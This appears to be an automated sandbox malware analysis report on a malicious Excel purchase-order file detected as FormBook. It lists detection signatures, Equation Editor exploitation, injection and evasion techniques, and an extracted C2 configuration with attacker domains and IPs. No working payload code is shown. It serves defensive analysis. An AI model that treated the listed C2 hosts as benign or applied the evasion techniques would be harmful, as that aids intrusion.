Windows Analysis Report
PO.78NO9.xls

Overview

General Information

Sample name: PO.78NO9.xls
Analysis ID: 1527625
MD5: f4d2762d6fc4b70c3c88ab984e74d7cf
SHA1: ce98c26ec0a34cd39337e94afb3d5cc8409bf944
SHA256: 781b57f2c750077fea3540b45ab5be0a9f1eac03b02d5ebbd89e4558ec130e50
Tags: xlsuser-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Found malware configuration
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lefeetlab.net/gwdv/"], "decoy": ["boyxlife.cyou", "v9.delivery", "intelliflow.run", "gstech.cloud", "qzbqtu.cyou", "splunk-test.dev", "nasocnite.xyz", "outdooradventuregearhub511.shop", "uptobisone.website", "andyouwannafuck.cloud", "blancslatespeedshop.com", "technical.cash", "highercall.net", "incronizid.dev", "tzx9y.rest", "brakpanbrand.net", "stimna.love", "thefarmerzpizza.info", "full4d.net", "lingerie-16071.bond", "ouc24.buzz", "spanish-classes-13883.bond", "slhub.xyz", "redcampgear.shop", "prefabricated-homes-48151.bond", "senior-dating-73474.bond", "betnirmala.pro", "xdns.dev", "nvpvr.info", "my-tournament.live", "20040523.xyz", "tb4r.net", "papayan.xyz", "longbeibusiness.life", "workweek.world", "besuperclinic.com", "online-dating-68375.bond", "yourdentalcare.shop", "seo7x.digital", "back-pain-treatment-11921.bond", "hme8h3f.shop", "cip138max.site", "bet-flix.live", "lmodt.info", "m-tb-zy.shop", "ylu8g260nq.cyou", "victorygameconsiderations.homes", "accountingcourse06.shop", "blackwavetattoostudio.com", "divineworks.store", "momomooncakes.net", "kemari.click", "3rhis.shop", "familyswim.xyz", "pp557.vip", "3dnu3uix.college", "massage-courses-infinity.sbs", "jandjacres.net", "dental-implants-84866.bond", "mahjowefvvcne.space", "inkalternatif188bet.net", "birthinjurylawyers825880.online", "yycvoc.sbs", "mdnews.tech"]}
Multi AV Scanner detection for submitted file
Source: PO.78NO9.xls Virustotal: Detection: 16% Perma Link
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: PO.78NO9.xls Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_009340B9 CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError, 27_2_009340B9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_009279B8 CryptMsgOpenToDecode,GetLastError,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,GetLastError,CertOpenStore,CryptMsgClose, 27_2_009279B8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_009269BE memset,CryptSignMessage,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain, 27_2_009269BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00927135 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore, 27_2_00927135
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00933AD1 CryptProtectData,LocalAlloc,memcpy,LocalFree, 27_2_00933AD1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0091D3DF CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree, 27_2_0091D3DF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00933C77 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 27_2_00933C77
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00933DD8 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree, 27_2_00933DD8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_009135FC memset,CryptUIDlgViewCertificateW,GetLastError, 27_2_009135FC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0091D561 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 27_2_0091D561
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00933F45 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 27_2_00933F45

Exploits
barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 38.240.41.28 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe Jump to behavior
Document contains Microsoft Equation 3.0 OLE entries
Source: ~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp.4.dr Stream path '_1789768840/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp.4.dr Stream path '_1789768844/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.511016346.0000000001EE0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.512113443.0000000002040000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637891163.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: aspnet_regbrowsers.pdb source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mstsc.pdb source: aspnet_regbrowsers.exe, 00000016.00000002.512368653.00000000008A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BKsn.pdbSHA256z source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BKsn.pdb source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
